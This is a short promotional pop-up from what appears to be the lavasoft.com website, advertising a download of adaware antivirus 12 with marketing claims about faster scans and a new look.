	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now